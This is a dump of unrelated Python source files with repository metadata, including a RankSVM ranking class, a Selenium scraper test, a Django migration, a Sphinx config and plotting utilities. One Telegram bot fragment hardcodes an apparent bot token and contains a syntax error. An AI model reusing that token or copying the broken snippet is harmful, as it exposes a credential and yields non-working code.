            # Alternate the output class with the pair index to balance the
            # classes; flip the difference vector to keep the pair consistent.
            delta = -delta
            sign = -sign
        diffs.append(delta)
        signs.append(sign)
    return np.asarray(diffs), np.asarray(signs).ravel()
class RankSVM(object):
    """Pairwise ranking with an underlying linear support vector classifier.

    The n-level ranking problem is converted by ``transform_pairwise`` into
    a binary classification problem on sample differences; the learned,
    normalized weight vector then scores unseen samples.

    Note: despite the original docstring's mention of LinearSVC, the
    estimator actually used is ``svm.SVC(kernel='linear')``.
    """

    def __init__(self):
        self.clf = svm.SVC(kernel='linear', C=.1)
        # Normalized weight vector; populated by fit().
        self.coef = None

    def fit(self, X, y):
        """
        Fit a pairwise ranking model.

        Parameters
        ----------
        X : array, shape (n_samples, n_features)
        y : array, shape (n_samples,) or (n_samples, 2)

        Returns
        -------
        None — the fitted direction is stored on ``self.coef``.
        """
        X_trans, y_trans = transform_pairwise(X, y)
        self.clf.fit(X_trans, y_trans)
        # Unit-norm primal weights of the linear-kernel SVC.
        self.coef = self.clf.coef_.ravel() / np.linalg.norm(self.clf.coef_)

    def predict(self, X):
        # Score = projection onto the learned direction; sorting the scores
        # yields the predicted ranking.
        if self.coef is not None:
            return np.dot(X, self.coef)
        else:
            raise ValueError("Must call fit() prior to predict()")

    def score(self, X, y):
        # NOTE(review): the two prints below look like leftover debugging.
        print(np.dot(X, self.coef).shape)
        print(y.shape)
        # Kendall's tau between predicted scores and the true targets.
        tau, _ = stats.kendalltau(np.dot(X, self.coef), y)
        return tau
if __name__ == '__main__':
    # as showcase, we will create some non-linear data
    # and print the performance of ranking vs linear regression
    np.random.seed(1)
    n_samples, n_features = 300, 5
    true_coef = np.random.randn(n_features)
    X = np.random.randn(n_samples, n_features)
    noise = np.random.randn(n_samples) / np.linalg.norm(true_coef)
    y = np.dot(X, true_coef)
    y = np.arctan(y)  # add non-linearities
    y += .1 * noise  # add noise
    Y = np.c_[y, np.mod(np.arange(n_samples), 5)]  # add query fake id
    kf = model_selection.KFold(n_splits=5, shuffle=True)
    # cv = model_selection.KFold(n_samples, 5)
    # NOTE(review): iterating a KFold instance directly (instead of
    # kf.split(X)) fails on modern scikit-learn — confirm intended version.
    train, test = list(iter(kf))[-1]

    # make a simple plot out of it
    # import pylab as pl
    # pl.scatter(np.dot(X, true_coef), y)
    # pl.title('Data to be learned')
    # pl.xlabel('<X, coef>')
    # pl.ylabel('y')
    # pl.show()

    # print the performance of ranking
    rank_svm = RankSVM()
    rank_svm.fit(X[train], Y[train])
    print('Performance of ranking ', rank_svm.score(X[test], Y[test][:, 0]))
    # print(rank_svm.predict(X[test]))

    # and that of linear regression
    ridge = linear_model.RidgeCV(fit_intercept=True)
    ridge.fit(X[train], y[train])
    # X_test_trans, y_test_trans = transform_pairwise(X[test], y[test])
    # score = np.mean(np.sign(np.dot(X_test_trans, ridge.coef_)) == y_test_trans)
    score, _ = stats.kendalltau(np.dot(X[test], ridge.coef_), Y[test][:, 0])
    print('Performance of linear regression ', score)
| [
"1225646303@qq.com"
] | 1225646303@qq.com |
82575ef7f307733145700be6a98b158fd12278da | d0d1e07c984651f96bd9386d546c85c0341e46b2 | /scripts/kivy_experiments/importing/wombat2.py | 17307767b7aa1edc3ac0fe22fb3bb81f93eacf4a | [
"MIT"
] | permissive | timedata-org/timedata | 61cde905b1fe9eb60ac83ecbf5a5a2114793c45d | 3faac7450678aaccd4a283d0d41ca3e7f113f51b | refs/heads/master | 2020-04-11T12:03:57.962646 | 2019-06-09T10:05:16 | 2019-06-09T10:05:52 | 51,217,217 | 5 | 3 | null | 2016-09-18T16:20:43 | 2016-02-06T19:13:43 | C++ | UTF-8 | Python | false | false | 173 | py | from kivy.uix.label import Label
class Wombat2(Label):
    # Minimal Label subclass that announces its construction on stdout —
    # apparently used to trace when widgets get built in import experiments.
    def __init__(self, *args, **kwds):
        super().__init__(*args, **kwds)
        print('wombat2 constructed')
| [
"tom@swirly.com"
] | tom@swirly.com |
4ed252d7f3459a256fba7d6f46a04fdc456dec6c | 3d50f97420e7aa79be37cc238555ef2038064afb | /stocks/tests/models/test_HSGTCGHold.py | 5bc7b08ac0cbc7b9c39c326e5fcb5beff4924753 | [
"MIT"
] | permissive | tauruswang/wanggeService | d6948704f5e28c1603e864e32986cc91eaf816b2 | 7aa6687ece9a865930c5dbab506cad5955848457 | refs/heads/master | 2020-03-19T05:52:36.264023 | 2018-06-01T03:32:27 | 2018-06-01T03:32:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,490 | py | # -*- coding: utf-8 -*-
"""
-------------------------------------------------
@File : test_HSGTCGHold.py
Description :
@Author : pchaos
date: 2018-5-31
-------------------------------------------------
Change Activity:
18-5-31:
@Contact : p19992003#gmail.com
-------------------------------------------------
"""
from django.test import TestCase
from stocks.models import HSGTCGHold
import selenium
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from bs4 import BeautifulSoup
import re
import pandas as pd
import numpy as np
import datetime, time
__author__ = 'pchaos'
class TestHSGTCGHold(TestCase):
    """Integration tests for the HSGTCGHold (northbound holdings) model."""

    def test_stockstatistics(self):
        """Scrape eastmoney for northbound holdings above the value threshold.

        (Original docstring: 北持股向市值大于八千万)
        :return:
        """
        browser = webdriver.Firefox()
        browser.maximize_window()
        try:
            results = []
            pages = range(1, 37, 1)
            pages = range(1, 250, 1)  # sorted by 30-day market value (original: 30日市值排序)
            url = 'http://data.eastmoney.com/hsgtcg/StockStatistics.aspx'
            browser.get(url)
            # switch to the northbound-holdings tab (original: 北向持股)
            browser.find_element_by_css_selector('.border_left_1').click()
            time.sleep(2)
            # click the header cell to sort by market value (original: 市值排序)
            browser.find_element_by_css_selector(
                '#tb_ggtj > thead:nth-child(1) > tr:nth-child(1) > th:nth-child(8)').click()
            time.sleep(1.5)
            for page in pages:
                soup = BeautifulSoup(browser.page_source, 'lxml')
                table = soup.find_all(id='tb_ggtj')[0]
                df = pd.read_html(str(table), header=1)[0]
                df.columns = ['tradedate', 'code', 'name', 'a1', 'close', 'zd', 'hvol', 'hamount', 'hpercent', 'oneday',
                              'fiveday',
                              'tenday']
                # left-pad stock codes back to six digits (presumably lost
                # when read_html parsed them as numbers — confirm)
                df['code'] = df.code.astype(str)
                df['code'] = df['code'].apply(lambda x: x.zfill(6))
                # hz2Num presumably converts Chinese-unit strings to numbers
                df['hvol'] = df['hvol'].apply(lambda x: HSGTCGHold.hz2Num(x)).astype(float)
                df['hamount'] = df['hamount'].apply(lambda x: HSGTCGHold.hz2Num(x)).astype(float)
                # drop unused columns
                del df['oneday']
                del df['fiveday']
                del df['tenday']
                del df['a1']
                results.append(df[df['hamount'] >= 8000])
                if len(df[df['hamount'] < 8000]):
                    # rows below the threshold reached: stop paging
                    break
                else:
                    # jump to the next result page
                    t = browser.find_element_by_css_selector('#PageContgopage')
                    t.clear()
                    t.send_keys(str(page + 1))
                    btnenable = True
                    while btnenable:
                        try:
                            btn = browser.find_element_by_css_selector('.btn_link')
                            btn.click()
                            btnenable = False
                        except Exception as e:
                            print('not ready click. Waiting')
                            time.sleep(0.1)
                    time.sleep(1.5)
            # print(df)
            print('results\n{}'.format(results))
        finally:
            if browser:
                browser.close()
        self.assertTrue(len(results) > 3)
        # merge the per-page frames into one
        dfn = pd.DataFrame()
        for dfa in results:
            dfn = pd.concat([dfn, dfa])
        dfn.reset_index(drop=True, inplace=True)
        self.assertFalse(dfn[['code', 'tradedate']] is None)
        df = dfn[['code', 'tradedate']]
        # drop duplicate (code, tradedate) rows
        df = df[~df.duplicated()]
        # pandas dataframe save to model
        HSGTCGHold.objects.bulk_create(
            HSGTCGHold(**vals) for vals in df[['code', 'tradedate']].to_dict('records')
        )
        self.assertTrue(HSGTCGHold.getlist().count() > 0, '北向持股大于七千万的股票数量大于0')
        print(HSGTCGHold.getlist())

    def test_importList(self):
        # importList() should persist yesterday's holdings so getlist()
        # returns a non-trivial queryset with date-typed tradedate values.
        HSGTCGHold.importList()
        hsg = HSGTCGHold.getlist(tradedate=datetime.datetime.now().date() - datetime.timedelta(1))
        self.assertTrue(hsg.count() > 10 , '北向持股大于七千万的股票数量大于10, 实际数量:{}'.format(hsg.count()))
        self.assertTrue(isinstance(hsg[0].tradedate, datetime.date))
"drifthua@gmail.com"
] | drifthua@gmail.com |
0417c2835eac339494cbb1098e8e8fd018780afa | 8d86f0d90a36b97903d07455edb37611a6958832 | /Apps/users/migrations/0001_initial.py | d7bdc634de207e4003b00c5aec1e4d014aaca00a | [] | no_license | urimeba/diagnosticapp | 4615232224e61e513dcce6557197eeca9b9ece86 | 311bdadabe6c2883c6d7395963cd23c3d7ebca03 | refs/heads/main | 2023-01-21T07:48:04.510799 | 2020-11-30T21:28:21 | 2020-11-30T21:28:21 | 313,359,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,037 | py | # Generated by Django 3.1.3 on 2020-11-23 19:29
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated initial migration for the users app: creates a custom
    # User model mirroring Django's default auth user fields plus two extra
    # profile fields (``genero``, ``edad``).

    initial = True

    dependencies = [
        ('auth', '0012_alter_user_first_name_max_length'),
    ]

    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                ('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
                ('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
                ('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
                ('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
                ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
                ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
                ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
                ('genero', models.CharField(choices=[('H', 'Hombre'), ('M', 'Mujer')], max_length=1, null=True, verbose_name='Genero')),
                ('edad', models.PositiveIntegerField(null=True)),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
                ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
            ],
            options={
                'verbose_name_plural': 'Usuarios',
                'ordering': ['id'],
            },
            managers=[
                ('objects', django.contrib.auth.models.UserManager()),
            ],
        ),
    ]
"urimeba511@gmail.com"
] | urimeba511@gmail.com |
7bb83d0baa185fe756143ee095e6f0fecca1c70b | dafafb8f65cd93dd1f6567d9b8e431e31f19ae68 | /dms/views/apply/music.py | de272d9f96fe77147c3b2527b8dad48277fe174a | [
"MIT"
] | permissive | SangminOut/DMS-Sanic | 7fb877b2a772de808b7391428e151b2a2645c59d | bbb65c584711fa23dbf0455300307c2acceba013 | refs/heads/master | 2020-06-15T06:11:33.116199 | 2019-07-14T12:57:11 | 2019-07-14T12:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | from sanic.request import Request
from sanic.views import HTTPMethodView
class MusicApplyView(HTTPMethodView):
    # Endpoints for the weekly music application; ``weekday`` selects the
    # day being queried/modified.  All three handlers are unimplemented
    # stubs (they currently return nothing).

    def get(self, request: Request, weekday: int):
        """
        Response Music Apply Status
        """
        pass

    def post(self, request: Request, weekday: int):
        """
        Apply Music
        """
        pass

    def delete(self, request: Request, weekday: int):
        """
        Delete Music apply on the weekday
        """
        pass
| [
"python@istruly.sexy"
] | python@istruly.sexy |
24430bb2f438aace2477e6ae54cfe4c876848f5c | 4dd695521343d56ff943e8c1768343d7680714e3 | /experiments/scripts_auto_closedset_ynoguti/config_SVM_128_fold10.py | f5343d3ddb38f0516fe592dabbc19c413e186cf9 | [] | no_license | natharb/environment | ea659ee541f6473e92b5b30c549e52b66f47b280 | 86e6cee6e01d2370abeb7c55a2c8a15001735919 | refs/heads/master | 2021-09-28T02:39:02.222966 | 2018-11-13T12:03:34 | 2018-11-13T12:03:34 | 139,762,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,353 | py | #!/usr/bin/env python
# vim: set fileencoding=utf-8 :
#Nathália Alves Rocha Batista (nathbapt@decom.fee.unicamp.br)
import sys
sys.path.insert(0, '.')
import bob.bio.spear
import bob.bio.gmm
import numpy
import scipy.spatial
# Output locations for intermediate files and final evaluation results of
# this fold (SVM system, 128 Gaussians, fold 10, closed-set protocol).
temp_directory = './results/closedset_ynoguti/SVM/128/fold_10/temp/'
result_directory = './results/closedset_ynoguti/SVM/128/fold_10/results/'
sub_directory = 'subdirectory'
# Database/protocol definition matching this fold.
database = 'database_SVM_128_fold10.py'
groups = ['dev']
#groups = ['dev', 'eval']
# Voice activity detection via a 2-Gaussian energy model.
preprocessor = bob.bio.spear.preprocessor.Energy_2Gauss(max_iterations = 10, convergence_threshold = 0.0005, variance_threshold = 0.0005, win_length_ms = 20., win_shift_ms = 10., smoothing_window = 10)
# Cepstral features: 19 MFCCs + energy with deltas and double-deltas
# (20 * 3 = 60-dimensional vectors).
extractor = bob.bio.spear.extractor.Cepstral(win_length_ms = 25, win_shift_ms = 10, n_filters = 24 , dct_norm = False, f_min = 0, f_max = 4000, delta_win = 2, mel_scale = True, with_energy = True, with_delta = True, with_delta_delta = True, n_ceps = 19, pre_emphasis_coef = 0.97)
# SVM classifier over 128-Gaussian GMM statistics; fixed seed for
# reproducible k-means/GMM initialization.
algorithm = bob.bio.gmm.algorithm.SVMGMM(number_of_gaussians = 128, kmeans_training_iterations = 10, gmm_training_iterations = 10,
    training_threshold = 5e-4, variance_threshold = 5e-4, update_weights = True, update_means = True, update_variances = True, relevance_factor = 4, gmm_enroll_iterations = 1, responsibility_threshold = 0, INIT_SEED = 5489)
#parallel = 40
#verbose = 2
"nathbapt@decom.fee.unicamp.br"
] | nathbapt@decom.fee.unicamp.br |
de9de4589510affd0dcae62be57fd19a0178ca96 | 2baf095631192604a2aabdeeb2aa230b4229076c | /benchmark/plot.py | ce577c556d017b0073c4627b5c3a452d4c50a29d | [] | no_license | ximitiejiang/machine_learning_algorithm | 14ea7cf991381375b6cbe34030a477e6a949abe1 | a26c64a561985444c1fc23db4ab298af255d1177 | refs/heads/master | 2020-03-26T23:02:10.614960 | 2019-12-05T14:54:49 | 2019-12-05T14:54:49 | 145,505,075 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,736 | py | import progressbar
#from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import matplotlib.cm as cmx
import matplotlib.colors as colors
import numpy as np
#from mlfromscratch.utils.data_operation import calculate_covariance_matrix
#from mlfromscratch.utils.data_operation import calculate_correlation_matrix
#from mlfromscratch.utils.data_manipulation import standardize
# Shared progress-bar layout used while training models.
bar_widgets = [
    'Training: ', progressbar.Percentage(), ' ', progressbar.Bar(marker="-", left="[", right="]"),
    ' ', progressbar.ETA()
]
def calculate_variance(X):  # per-feature variance
    """ Return the (population) variance of the features in dataset X """
    n_samples = np.shape(X)[0]
    # Center each column on its mean, then read the per-feature sums of
    # squares off the diagonal of the Gram matrix.
    centered = X - np.ones(np.shape(X)) * X.mean(0)
    return np.diag(centered.T.dot(centered)) * (1 / n_samples)
def calculate_std_dev(X):  # per-feature standard deviation
    """ Calculate the standard deviations of the features in dataset X """
    # Element-wise square root of the per-feature (population) variance.
    std_dev = np.sqrt(calculate_variance(X))
    return std_dev
def standardize(X):  # feature standardization
    """ Standardize the dataset X (zero mean, unit variance per feature).

    Bug fix: the original bound ``X_std = X`` without copying, so the
    caller's array was silently mutated in place; this version works on a
    copy.  Columns with zero standard deviation are left uncentered and
    unscaled to avoid division by zero.
    """
    X_std = X.copy()
    mean = X.mean(axis=0)
    std = X.std(axis=0)
    for col in range(np.shape(X)[1]):
        if std[col]:
            X_std[:, col] = (X_std[:, col] - mean[col]) / std[col]
    # X_std = (X - X.mean(axis=0)) / X.std(axis=0)
    return X_std
def calculate_covariance_matrix(X, Y=None):  # sample covariance
    """ Calculate the (sample, 1/(n-1)) covariance matrix for dataset X.

    When ``Y`` is given, the cross-covariance between the features of X
    and Y is returned instead.
    """
    if Y is None:
        Y = X
    n_samples = np.shape(X)[0]
    X_centered = X - X.mean(axis=0)
    Y_centered = Y - Y.mean(axis=0)
    covariance_matrix = (1 / (n_samples - 1)) * X_centered.T.dot(Y_centered)
    return np.array(covariance_matrix, dtype=float)
def calculate_correlation_matrix(X, Y=None):  # correlation matrix
    """ Calculate the correlation matrix for the dataset X """
    if Y is None:
        Y = X
    n_samples = np.shape(X)[0]
    # NOTE(review): this uses the population normalization (1/n) while
    # calculate_covariance_matrix above uses the sample one (1/(n-1)) —
    # confirm the mismatch is intentional.
    covariance = (1 / n_samples) * (X - X.mean(0)).T.dot(Y - Y.mean(0))
    std_dev_X = np.expand_dims(calculate_std_dev(X), 1)
    std_dev_y = np.expand_dims(calculate_std_dev(Y), 1)
    # Correlation = covariance scaled by the outer product of std deviations.
    correlation_matrix = np.divide(covariance, std_dev_X.dot(std_dev_y.T))
    return np.array(correlation_matrix, dtype=float)
class Plot():
    """Matplotlib helpers that project datasets with PCA before plotting."""

    def __init__(self):
        self.cmap = plt.get_cmap('viridis')

    def _transform(self, X, dim):
        # PCA: project X onto its first ``dim`` principal components.
        covariance = calculate_covariance_matrix(X)
        eigenvalues, eigenvectors = np.linalg.eig(covariance)
        # Sort eigenvalues and eigenvectors by largest eigenvalues
        idx = eigenvalues.argsort()[::-1]
        eigenvalues = eigenvalues[idx][:dim]
        eigenvectors = np.atleast_1d(eigenvectors[:, idx])[:, :dim]
        # Project the data onto the principal components
        X_transformed = X.dot(eigenvectors)
        return X_transformed

    def plot_regression(self, lines, title, axis_labels=None, mse=None, scatter=None, legend=None):
        """Plot regression line(s), optionally over scattered data points.

        Bug fixes versus the original:
        * ``legend`` defaulted to a shared mutable dict; it is now built
          per call (same default value).
        * ``scatter_plots`` and ``scatter_labels`` were bound to the *same*
          list, so artists and labels ended up interleaved in both.
        * the line loop used ``s["color"]`` — a NameError when no scatter
          is given, and otherwise the last scatter entry's colour; each
          line's own optional "color" key is used instead.
        * ``loc="lower_left"`` is not a valid matplotlib location string.
        """
        if legend is None:
            legend = {"type": "lines", "loc": "lower right"}
        scatter_plots = []
        scatter_labels = []
        if scatter:
            for s in scatter:
                scatter_plots += [plt.scatter(s["x"], s["y"], color=s["color"], s=s["size"])]
                scatter_labels += [s["label"]]
            scatter_plots = tuple(scatter_plots)
            scatter_labels = tuple(scatter_labels)

        for l in lines:
            plt.plot(l["x"], l["y"], color=l.get("color"), linewidth=l["width"], label=l["label"])

        if mse:
            plt.suptitle(title)
            plt.title("MSE: %.2f" % mse, fontsize=10)
        else:
            plt.title(title)

        if axis_labels:
            plt.xlabel(axis_labels["x"])
            plt.ylabel(axis_labels["y"])

        if legend["type"] == "lines":
            plt.legend(loc="lower left")
        elif legend["type"] == "scatter" and scatter:
            plt.legend(scatter_plots, scatter_labels, loc=legend["loc"])

        plt.show()

    # Plot the dataset X and the corresponding labels y in 2D using PCA.
    def plot_in_2d(self, X, y=None, title=None, accuracy=None, legend_labels=None):
        X_transformed = self._transform(X, dim=2)
        x1 = X_transformed[:, 0]
        x2 = X_transformed[:, 1]
        class_distr = []

        y = np.array(y).astype(int)

        # One colour per class (note: this local name shadows the
        # module-level ``matplotlib.colors`` import, unused here).
        colors = [self.cmap(i) for i in np.linspace(0, 1, len(np.unique(y)))]

        # Plot the different class distributions
        for i, l in enumerate(np.unique(y)):
            _x1 = x1[y == l]
            _x2 = x2[y == l]
            class_distr.append(plt.scatter(_x1, _x2, color=colors[i]))

        # Plot legend
        if not legend_labels is None:
            plt.legend(class_distr, legend_labels, loc=1)

        # Plot title
        if title:
            if accuracy:
                perc = 100 * accuracy
                plt.suptitle(title)
                plt.title("Accuracy: %.1f%%" % perc, fontsize=10)
            else:
                plt.title(title)

        # Axis labels
        plt.xlabel('Principal Component 1')
        plt.ylabel('Principal Component 2')
        plt.show()

    # Plot the dataset X and the corresponding labels y in 3D using PCA.
    def plot_in_3d(self, X, y=None):
        X_transformed = self._transform(X, dim=3)
        x1 = X_transformed[:, 0]
        x2 = X_transformed[:, 1]
        x3 = X_transformed[:, 2]
        fig = plt.figure()
        ax = fig.add_subplot(111, projection='3d')
        ax.scatter(x1, x2, x3, c=y)
        plt.show()
| [
"ximitiejiang@163.com"
] | ximitiejiang@163.com |
7fa07c81e77c3c7452bffd7ef527182c0b399ad3 | 8da91c26d423bacbeee1163ac7e969904c7e4338 | /pyvisdk/do/host_internet_scsi_hba_authentication_capabilities.py | c35666aac4c0338cccda1bb6bc8f959b7d9f3d45 | [] | no_license | pexip/os-python-infi-pyvisdk | 5d8f3a3858cdd61fb76485574e74ae525cdc7e25 | 1aadea0afbc306d09f6ecb9af0e683dbbf961d20 | refs/heads/master | 2023-08-28T02:40:28.789786 | 2020-07-16T04:00:53 | 2020-07-16T04:00:53 | 10,032,240 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py |
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def HostInternetScsiHbaAuthenticationCapabilities(vim, *args, **kwargs):
    '''The authentication capabilities for this host bus adapter.

    Creates the SOAP object via vim.client.factory and copies positional
    values onto it in required+optional order, then applies keyword values.
    Raises IndexError when fewer than the 4 required values are supplied and
    InvalidArgumentError for unknown keyword names.
    '''

    obj = vim.client.factory.create('{urn:vim25}HostInternetScsiHbaAuthenticationCapabilities')

    # do some validation checking...
    if (len(args) + len(kwargs)) < 4:
        # Report the real requirement (4) and the total number supplied; the
        # original message claimed "at least 5" and counted only *args.
        raise IndexError('Expected at least 4 arguments got: %d' % (len(args) + len(kwargs)))

    required = [ 'chapAuthSettable', 'krb5AuthSettable', 'spkmAuthSettable', 'srpAuthSettable' ]
    optional = [ 'mutualChapSettable', 'targetChapSettable', 'targetMutualChapSettable',
        'dynamicProperty', 'dynamicType' ]

    for name, arg in zip(required+optional, args):
        setattr(obj, name, arg)

    for name, value in kwargs.items():
        if name in required + optional:
            setattr(obj, name, value)
        else:
            raise InvalidArgumentError("Invalid argument: %s.  Expected one of %s" % (name, ", ".join(required + optional)))

    return obj
| [
"jmb@pexip.com"
] | jmb@pexip.com |
5ae62e7a2aebbe4228d9013bd093f34148deefa5 | d57b51ec207002e333b8655a8f5832ed143aa28c | /.history/nanachi_20200619190147.py | 86f02fde6c3e6677051477be28e1a4ea19c0aee3 | [] | no_license | yevheniir/python_course_2020 | b42766c4278a08b8b79fec77e036a1b987accf51 | a152d400ab4f45d9d98d8ad8b2560d6f0b408c0b | refs/heads/master | 2022-11-15T07:13:24.193173 | 2020-07-11T15:43:26 | 2020-07-11T15:43:26 | 278,890,802 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | import telebot
bot = telebot.TeleBot('776550937:AAELEr0c3H6dM-9QnlDD-0Q0Fcd65pPyAiM')
@bot.message_handler(content_types=['text'])
def send_text(message):
if message.text[0].lower() == "н" and :
bot.send_message(message.chat.id, message.text + message.text[1:] )
bot.polling()
def c | [
"yevheniira@intelink-ua.com"
] | yevheniira@intelink-ua.com |
f6ce243146b5a953f28c66da59306e9142735527 | bad0f9497e549d729d342f84d7fae197cccdd198 | /docs/source/conf.py | 77b14d6ed6f15026ed9dce76aebf1bae589ece6e | [
"BSD-3-Clause"
] | permissive | talpor/django-activity-stream | 2f900dc95561d9bdaf23934463524c68bae567de | 8348bec4ee80be2cc19aa17932ecaf81f6df9def | refs/heads/master | 2021-01-15T23:02:45.341247 | 2018-05-17T18:50:50 | 2018-05-17T18:50:50 | 32,185,029 | 0 | 0 | null | 2015-03-13T22:55:08 | 2015-03-13T22:55:06 | Python | UTF-8 | Python | false | false | 5,763 | py | # -*- coding: utf-8 -*-
#
# Django Activity Stream documentation build configuration file, created by
# sphinx-quickstart on Sat Oct 1 12:35:29 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
from datetime import datetime

# Give Django a settings module and make the package importable so that
# Sphinx autodoc can import actstream while building from docs/source/.
os.environ['DJANGO_SETTINGS_MODULE'] = 'actstream.runtests.settings'
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../../actstream/runtests'))
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../..'))

import django
try:
    django.setup()
except AttributeError:
    # django.setup() was added in Django 1.7; older versions need no setup.
    pass

import actstream
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Django Activity Stream'
copyright = u'2010-%s, Justin Quick. Activity Streams logo released under ' \
u'<a href="http://creativecommons.org/licenses/by/3.0/">Creative Commons 3.0</a>' % datetime.now().year
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = actstream.get_version(False)
# The full version, including alpha/beta/rc tags.
release = actstream.get_version()
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'tango'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
import alabaster
extensions.append('alabaster')
html_theme_path = [alabaster.get_path()]
html_theme = 'alabaster'
html_sidebars = {
'**': [
'about.html', 'navigation.html', 'searchbox.html', 'donate.html',
]
}
html_static_path = ['_static']
html_theme_options = {
'logo': 'logo.jpg',
'logo_text_align': 'center',
'description': 'Generic activity streams for Django',
'github_user': 'justquick',
'github_repo': 'django-activity-stream',
'travis_button': True,
'gittip_user': 'justquick',
'analytics_id': 'UA-42089198-1'
}
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoActivityStreamdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'DjangoActivityStream.tex', u'Django Activity Stream Documentation',
u'Justin Quick', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'djangoactivitystream', u'Django Activity Stream Documentation',
[u'Justin Quick'], 1)
]
| [
"justquick@gmail.com"
] | justquick@gmail.com |
5ece19536166f0b866ad549915f7002b119a6b49 | 1b3e62ac5655fbcbb7cf95724354c8e69d487745 | /HSE WEEK 5/HSE 5 Task 31.py | c9619f61ea9d0944c84c7a376de659ef19fa3cc9 | [] | no_license | syth0le/HSE.Python | 7d97f38e9b57825b54ac2576b00731240eef227c | e9a15b1ed5e21d56281e4619a39198d5d2838f0b | refs/heads/master | 2021-01-14T17:35:30.427970 | 2020-03-24T17:23:30 | 2020-03-24T17:23:30 | 242,698,160 | 5 | 1 | null | 2020-03-23T19:41:20 | 2020-02-24T09:43:15 | Python | UTF-8 | Python | false | false | 167 | py | numList = input().split()
# Swap every adjacent pair of tokens in place: [a, b, c, d] -> [b, a, d, c]
# (a trailing unpaired token stays where it is).
for i in range(0, len(numList), 2):
    numList[i:i+2] = numList[i:i+2][::-1]
# input().split() already yields strings, so the original
# list(map(str, numList)) round-trip was redundant.
